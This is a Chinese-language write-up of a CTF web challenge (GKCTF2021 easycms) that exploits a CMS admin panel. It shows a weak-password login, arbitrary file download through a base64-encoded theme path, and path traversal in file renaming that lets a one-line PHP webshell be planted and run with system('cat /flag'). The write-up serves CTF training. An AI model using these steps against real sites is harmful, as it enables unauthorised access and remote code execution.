GKCTF2021-easycms-wp

题目链接

0x1 信息收集

  1. 页面点来点去发现没有有效跳转
  2. 漏洞库搜索蝉知也没找到相关CVE
  3. 目录扫描发现/admin.php

0x2 登录

弱口令admin 12345登录成功

0x3 CMS分析

经过探索后发现

  1. 设计 - 高级 当中可以更改全局php文件,但是有要求

    m

  2. 设计 - 组件 - 素材库 当中可以上传文件,但是像php, phtml, .htaccess什么的都上传不了,上传成功后可以编辑文件名、更换附件

  3. 设计 - 主题 - 自定义- 导出主题 可以下载文件

    m

    由此可以得到下载链接http://node4.anna.nssctf.cn:28447/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=

0x4 攻击

法一

下载链接中的theme字段明显为base64编码 解码为 /var/www/html/system/tmp/theme/default/1.zip

由此猜测可以实现任意文件下载,获取flag:

1
2
3
4
5
6
$ echo -n '/flag' | base64
L2ZsYWc=

# 访问 http://node4.anna.nssctf.cn:28447/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=
$ cat flag.zip
# flag

法二

  1. 素材库中上传txt文件,编辑文件名尝试目录穿越,以满足0x3.1.中修改php文件

    m

    提示保存成功(注意目录穿越中如果不知道相对路径可以尝试多加几个../保证回退到根目录再使用绝对路径即可)

  2. 再次重复0x3.1.长传一句话木马即可成功上传,此时访问主页面post cmd=system('cat /flag')即可

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP